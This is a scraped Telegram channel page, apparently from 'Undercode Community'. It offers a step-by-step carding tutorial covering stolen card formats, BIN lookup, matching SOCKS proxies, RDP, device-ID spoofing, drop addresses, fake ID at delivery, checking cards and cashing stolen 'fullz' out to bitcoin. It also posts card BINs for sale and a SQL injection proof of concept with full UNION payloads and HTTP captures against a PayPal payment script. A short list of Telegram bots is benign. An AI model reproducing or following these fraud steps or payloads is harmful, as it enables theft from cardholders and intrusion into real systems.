UNDERCODE COMMUNITY
2.69K subscribers
1.23K photos
31 videos
2.65K files
80.5K links
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

Web & Services:
Undercode.help
Download Telegram
5. RDP (Remote Desktop Protocol)
RDP is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the


other computer must run RDP server software. It will connect you with any computer that is located in others country. We use it for stay anon and safety. In one word you will use someone’s pc for carding instead of your own…

6. Drop
Drop is an address which you use for shipping address in carding. Let me explain… If you are carding with a USA CC, if you use a USA address as shipping address then order will ship 100% & you will be safe. So we have to manage USA address. If we have friends or relatives then no problem. Otherwise there is lots of website that give drop service. We will order in drop address..this website will receive our products and will send to us.. they will take few charge for it. No need for every shopping sites. For hard security sites only.

7. Credit Card (CC)
Read all very carefully. Don’t be lazy. This is the main part of carding. As fast as u understand it, success will come as fast.. When you buy CC from shop or somewhere else. It will be like below format



| credit card number | exp date| cvv2 code | name on the card | address | city | state | country | zip code | phone # (phone # sometimes not included depending on where you get your CC from) |

For Example:
4305873969346315|05|2018|591|UNITED STATES|David Mechanic|23 Stoney Brook Lane|Middleton|MA|01949|

Types of Cards :
Each credit card company starts their cards with a different number:
3 – American Express (AMEX)
4 – Visa 5 – MasterCard (MC) 6 – Discover (Disco)

Each card company has their own specific types of cards, here are some of the basics:

Visa
Classic – a universal payment tool, which was adopted worldwide in any
locations designated by the logo of Visa, including ATMs, real and virtual stores, and shops offering goods and services by mail and telephone. This card is intended for those who already have experience in the use of bank cards. It also enjoys popularity among consumers of middle-income, as a guaranteed convenience, choice and financial flexibility.

Gold – One of the leading products, has been adopted worldwide and allows you to enjoy an impressive financial freedom (aka higher limit)

Platinum – These usually have limits over $10,000 (but remember, just because it has a high limit, doesn’t mean it isn’t already maxed out)

Signature – No preset spending limit – great bin to get

Infinite – Most prestigious card, virtually no limit. Though there are less in circulation so be cautious when buying these, stick with reputable sellers!

Business – Used for small to medium-sized businesses, usually has a decent limit.

Corporate – Medium to large size businesses, larger limit than Business.

Black – limited membership, $500 annual fee, high-end card, no limit.

MasterCard
Standard – comparable to visa classic

Gold – comparable to visa gold

Platinum – comparable to visa plat

World – very high limit

World Elite – virtually no limit, high-end card.

Amex
Gold – usually around 10k limit

Platinum- usually higher limit, around 35k

Centurion – High limit, 75k+ (also known as the black card, not to be confused with visa’s black card)

What is BIN (Bank Identification Number)

– The first 6 numbers of CC is the BIN number.

– So from the above example, the bin is 486236

So now we will collect some info about this BIN. For that, there are so many websites. I prefer these below sites

1) www.bins.pro

2) www.exactbins.com
Go to above site, enter BIN and Click on Find… You will get result like bellow …
Paste image from pdf
Now we can calculate few things from above info.. approx balance, is this bin non vbv or vbv , Bank phone no. from google… etc. etc.I will explain later how to check cc balance with Skype method…
Let us know What is VBV/ NON-VBV/ MSC

VBV(Verified by Visa)
Extra verification process initially added by visa, there are different types of authentication used, most notably would be a password, date of birth, social security number, or mothers maiden name. Will send OTP t


o CC owner mobile No. or need secret Password when doing transaction in any process.

NON VBV(Verified by Visa)

Easy to use. No need of more info about CC like DOB, SSN, MMN. Also no need OTP when doing transaction.

MSC (Mastercard Secure Code)

As same as VBV We always buy NON VBV CC for carding. Cause the shopping site is VBV or NON VBV we don’t care, we have NON VBV CC. So no OTP, no AVS, no need SSN etc. NON VBV is not verifired by visa card, you can buy anything with non vbv cards without going through 3rd verification process. How to Buy NON VBV CC will explain later..

AVS – (Address Verification System)
A system used to verify the identity of the person claiming to own the credit card. The system will check the billing address of the credit card provided by the user with the address on file at the credit card company. This was an attempt to help identity theft and fraud over the internet. This is a system we as carders dont have to worry about since we have the billing address of the credit card holder. I mentioned it since it is good to be aware of it and that almost every site has this system. It emplifies the importance of typing in the address correctly.

I think u all know enough to do your first carding… So go to main part …

Before starting gather your all equipments:

Credit Card, Socks5 matching with CC owner address, CCleaner Software, MAC address changer software, High Speed internet

You can buy socks from www.vip72.com . Check socks for live or not with socksproxy checker app before set it in Firefox.

How to set socks in Mozilla Firefox:

Run firefox→ Go to Options→ → click on Advanced setting → Network
Now the screen will pop up with various options like : 1. No proxy; 2.Auto Detect; 3.Use system proxy; 4. Manual proxy configuration. You mark 4. Manual proxy configuration. Now type in socks host IP you have,

For example Socks Host: 141.0.8.24 Port: 1080

Press ok and restart firefox. Now you are connected to secure socks5..
When you buy SOCKS, it should always match with card holder address.
Ex. If CC holder from Newberry, South Calorina, MA, USA then you also buy socks with same address. Atleast matching State, Country…

How to card :



1. Make a email (gmail, hotmail ) with CC matching name. For example If CC name is Peter Mortan then make like petermortan1990@gmail.com

2. Run Remote Desktop Connection and connect with your RDP Host. If u don’t use rdp then do the following steps in your pc..

3. Run MAC address changer, change all MAC address.

4. Run CCleaner. Analyze and clean.

5. Set socks5 in Mozzila firefox. I already explain how to do it..

6. Restart Firefox and goto www.check2ip.com and check your ip is blacklisted or not & as same as CC holder address.

7. Now open shopping site. I want to recommend a website shop from your country. Why? Because you dont need to wait a lot for your package


8. Register with credit card holder information, name, country, city, address, and email you made one just for this order.


9. Choose your item & add to cart. Never choose big amount first.

Try to card small amount item first within $500.

10. In shipping address enter your address or your drop address, where you want to deliver product.


11.Go to payment page, choose Credit Card as payment method


12.Enter your CC details. Like CC Number, CC holder name, CVV/CVV, Exp. Date. Don’t copy – paste info. Type it one by one. Cause most site have copy-paste detector script..
13. In Billing address enter CC holder address. Now proceed to payment.

14. I am sure if you do everything right then order will be successfully placed..


15. Wait for order to arrive to your shipping address. When they arrive the corier boy will call you. The ask for any ID card. If you can make fake ID card then good. Otherwise show your any ID card (Adhar Card, Voter ID, College ID card)


How to Card From Mobile:

Though I don’t prefer carding from mobile. But if you follow belowsteps carefully then you can do that.


Basic reqirements for carding from Mobile :

1. Mobile must be rooted. (offcourse I pref


er any Android smartphone)


2. You must install few apps : IMEI changer, Phone ID changer, Android ID changer, Proxy Droid, CCleaner


3. You can use HMA VPN for carding in mobile.

4. You use SOCK5 proxy with Proxy Droid apps.

5. You must change IMEI, Android ID etc evrything before starting carding.

6. Now connect proxy droid with SOCKS5 proxy and connect it.


7. Now follow all steps of carding that mentioned above…

Ok, so you got your cc, your drop and try to be anonymous as you can make yourself.


Now, what sites are cardable?

-ANY AND ALL SITES ARE CARDABLE-

Why do I say that? because it’s true. Whatever your card, make sure that you have all your info prepared before carding it. If you don’t get success first time then you have to use other BIN CC and Others Method. Have used your brain & find different Logic for a different site. You may Kill 2-3 CC when trying any sites. But you will find out the working method for any site


OK….You know enough about CC. But don’t understand nothing.. Now let me clear all your doubt about acronyms and terms….


1. CC (Credit Card)

2. CCN (Credit Card Number) – Includes the number of the card and expiration date, no name or address.


3. CVV(Credit Verification Value) / (Card Security Code) / CVV2- The number on the back of the card used for verification purposes. 3 digit number for visa/mc and 4 digit for AMEX (American Express) (There is also CVV1 which is a verification number that is written into the magstripe on the back of the card that is read when the card is swiped)



4. Drop– an address where you can send carded goods, not your own house or friend or relatives.


5. SSN (Social Security Number) – one of the details of CC holder, used to bypass security measures


6. MMN (Mothers Maiden Name) – Comes in handy when bypassing security measures on VBV/MCSC. One of your security question.


7. DOB – Date of Birth – Used to bypass some security measures.


8. COB (Change of Billing) – Some stores will only ship large/high priced items if the shipping and billing info match, these can be obtained through some cvv sellers, usually in the form of a “Fulls”


9. Fulls –You listen many times “Fulls/ Fullz”. It is nothing but CC Details with more info eg. security question answers, SSN, DOB, MMN, etc. which can be used for COB, etc.

10. AVS (Address Verification Service) – System that checks the billing address entered against the credit card company’s records.

11. VBV (Verified by Visa) – Extra verification process initially added by visa, there are different types of authentication used, most notably would be a password, date of birth, social security number, or mothers maiden name.

12. MCSC (MasterCard SecureCode) – MC (MasterCard) adopted this process after VBV came out, basically the same thing but with mastercards.

13. POS (Point of Sale) – Terminal at a physical shop where the card is swiped/read


14. Dump – The information that is written onto the magnetic stripe on the back of the card, the only way to get dump is with a skimmer, comes in different “tracks” which I will not be explaining – a dump would look like

4131980030032319=11101010000000006460

15. Skimmer – A device that is normally attached to an atm where you insert your card, which records your card information (there are other variants, that is the most common)
16. Embosser – A device that “stamps” the cards to produce the raised lettering


17. Tipper – A device that adds the gold/silver accents to the embossed characters


18. MSR (Magnetic Stripe Reader/Writer) Used in the carding scene for writing dumps (and drivers license, student ID) info to blank cards or gift cards (if you want to use blank white cards, you will need a printer for the card template, embosser/tipper also, which can get costly to buy)


19. BIN (Bank Identification Number) – The first 6 digits of a card number (this will be gone over in more detail later on)

20. Novs (Novelty ID / Fake ID) – Commonly used for signing at drops, store pickups, WU Drops, Bank Drops, etc.


21. VPN (Virtual Privat


e Network ) – This will change your IP to wherever the location is of the VPN server. This is used with an application rather than through your browser as with socks. Watch out as some VPN providers will keep logs. But it leaks our DNS info so it is not safe


22. BTC (Bitcoin) – It is a digital currency. Used for buying anything in the digital world. You need it to buy CC, SOCKS, VPN etc and even you can exchange your local currency (INR/Dollar etc) to BTC. You can create wallet here www.blockchain.com

Few things you must remember before starting Carding:


Security to me is a key aspect of carding. However, an important thing to note is that IF THEY WANT TO GET YOU THAT BADLY; THEN THEY WILL NO MATTER WHAT.


Here are a few key security aspects you should take into consideration before getting started:

– When you have a CC, the next step is to get a socks5 in either the same city and state as the cardholder or as close to it as you can find. You must use socks.


– I personally use Firefox since it is stable, easy to use, you can load many unique and helpful plugins (tamper data, sniffers, etc).


– Many carders get sloppy over time and will neglect to clear history, or instead of shutting down their computer just put it to sleep so they don’t have to wait for it to decrypt, etc. Moral here? DON’T BE A LAZY!


– Emails – I personally use a new email for every site I card. Either Gmail or Yahoo works well for me.

How to know what is brand of CC at a glance:


If CCN (Credit Card Number) start with 3 then it is American Express (AMEX), if it starts with 4 then it is Visa, if it starts with 5 then it’s Mastercard…With VBV CC, most notably would be a password, date of birth, social security number, or mothers maiden name.

**In order to get by VBV you need the password, if you want to reset the password then you will need the DOB (date of birth), MMN (mothers maiden name), and SSN (social security number). So I personally prefer always By NON-VBV Credit Card


How to check CC Is Live or Dead:


There are so many websites that check CC live or dead. At the time of checking they charge CC $0.001. But almost 80% site kill the CC. So we never use it. There also few tools available on the internet for checking CC. It may be Backdoor/ Trojan. So don’t use it…..

There is no easy method for that. Carder makes there own way to do that. One of them is … Go to any porn website. Buy the membership and use your CC. If you got success then CC is Live. You must follow carding rule. Like using socks, rdp bla.. blah.


Search youtube for find latest method. Or google it “How to check CC is live or Dead”. You will get so many latest method.


How to check CC Balance (Skype Method):

This method only working for US & UK CC only

1. Check your BIN in www.binspro.com There you will get bank name. For above example, BIN (430587) bank is Capital One, USA.


2. Now search phone number of this bank in google. For Capital One it’s +1-800-935-9935


3. Call this number from skype it’s free since it’s toll-free number.

4. Now the automatic robot will ask you few details. Ex. CCN, CVV etc.

5. Now put your info by using your keyboard.

6. It will automatically tell you the CC balance.

WRITTEN BY uNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
full carding beginers
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
🦑Amazon Right Bin cc is available.


Bin Amazon Shopping



> Bin : 41472023xxxxxxxx
Date : 10/21
Cvv : 666


> IP : USA
This media is not supported in your browser
VIEW IN TELEGRAM
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Ali express bins
t.me/UndercodeTesting


51080501528xxxxx
08/22
Ip - USA

🦑Bins : Netflix
545404xxxxxxxxxx
530998xxxxxxxxxx
518695xxxxxxxxxx
IP: BRAZIL

CCLEANER V4.20.3 B800006534 [PRO]

> https://play.google.com/store/apps/details?id=com.piriform.ccleaner>


▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST TELEGRAM BOTS YOU SHOULD KNOW RECOMMENDED BY UNDERCODE:

1) BotFather
BotFather is the official Telegram Bot used to create bots and change settings for existing ones.

You’ll need BotFather even if you’re not going to make your own bots as a bot developer. Some bots for Telegram channel admins will ask you to use BotFather to generate Telegram Bot API tokens. So it’s good to get familiar with this procedure before we go any further.

Creating a new Telegram bot is pretty straightforward.

Just open BotFather, send /newbot command, pick a name and a username:


2) ControllerBot
ControllerBot is a feature-rich bot for Telegram channel owners.

It allows you to:

write rich-text posts with Markdown/HTML markup;
add reaction buttons (Emoji, text or both);
add button to open post comments;
schedule posts;
add self-destruct timer for temporary posts;
see channel stats.
Here is an example of how post reactions can be added with ControllerBot:


3)LivegramBot
LivegramBot is a feedback bot constructor.

Here is a self-explanatory example of this bot usage:


Feedback bots like this one can be used for everything: channels, group, bots and even websites.

4) VoteBot
VoteBot is a bot for creating polls in Telegram. Polls can be shared with friends or published in channels and groups.

Using VoteBot is very simple:


When poll is created, type @vote in your channel to open polls list:


5) Giphy GIF Search
Giphy GIF Search is a bot for searching and posting gifs. It can be used with channels as well.

Type @gif with a search query in your channel and gif suggestions will show up:


6) Telegraph
telegra.ph is a minimalistic publishing tool, that allows you to create rich-formatted posts with images, videos and other embedded stuff.

Telegram supports Instant View for the posts published with telegra.ph. It allows to read your posts right in the Telegram app, without visiting any other websites.

To manage your telegra.ph publications and log in across any number of devices try the official Telegraph bot.


7)InviteMember
InviteMember is a bot platform for subscription/membership bots

@UndercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Fast CC TO BTC :


> CC TO BTC TRICK


- Buy A Fresh Fullz CC (Visa/Mastercard)From Trusted Vendors Or *ME* (Fullz Have SSN)

- If You Bought Dallas(city),Texas(st) Cc Use Dallas Ip (must use 911 vpn or Rdp)

-After Connecting ip Go to outlook and make an email same as Cc Owner Name

- Then Go to cex.io ( cex.io is the best site to buy btc from credit cards)

- Register A New Account . Use Outlook eMail To Register as New :)

- After Registering, Verify your Email

- Ok Then We Can Add Balance To Cex.io ...... Click On Deposit then it will be redirect to payment gate.

- Now Fill Cc Details & Choose The Amount ( Choose Below 150$ First then succeeded we Can add more)

- Then Fill the Billing Address & SSN (Fullz Cc Will Have Billing Address & SSN)

- Then Click Proceed

- Then Account Will Be Funded with your choosed Amount (unless you use dead card) & After Success Fund More Amount How Much You Can Do With The Credit Card

- Now go to home page and click Buy/Sell

- Buy Bitcoin With Your Deposited Amount (If You deposited 700$ buy btc below 700$)

- Now you'll be turned into 700$ to Btc

- Now Go to Withdraw select Btc Then put your wallet address & select amount then click withdraw

Hurreyyy!!!! Now The Btc Instantly Will transfer to Your wallet.

@UndercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The 2018 Paypall CVE IS NOW PUBLIC FREE
> PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection
t.me/UndercodeTesting

🦑Tested by Undercode :

# POC:
# 1)
# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL]
#
#[PATH]/accomodation.php
#...
#50 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ACCOMODATION='" . $_GET['q'] . "' AND NUMPERSON = " . $_POST['person'];
#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ACCOMODATION='" . $_GET['q'] . "'";
#56
#57
#58
#59 }
#60
#61 $accomodation = ' | ' . $_GET['q'];
#62 ?>
#...
GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:55:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC:
# 2)
# http://localhost/[PATH]/index.php?p=rooms&q=[SQL]
#
#[PATH]/room_rates.php
#...
#50 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND NUMPERSON = " . $_POST['person'];
#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ROOM LIKE '%" . $_GET['q'] . "%'";
#56
#57
#58 }else{
#59 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID";
#60 }
#61
#62 $accomodation = ' | ' . @$_GET['q'];
#63 ?>
#...
GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:58:47 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC:
# 3)
# http://localhost/[PATH]/admin/login.php
#
#[PATH]/admin/login.php
#...
#58 if (isset($_POST['btnlogin'])) {
#59 //form has been submitted1
#60
#61 $uname = trim($_POST['email']);
#62 $upass = trim($_POST['pass']);
#...

@UndercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 last paypall exploit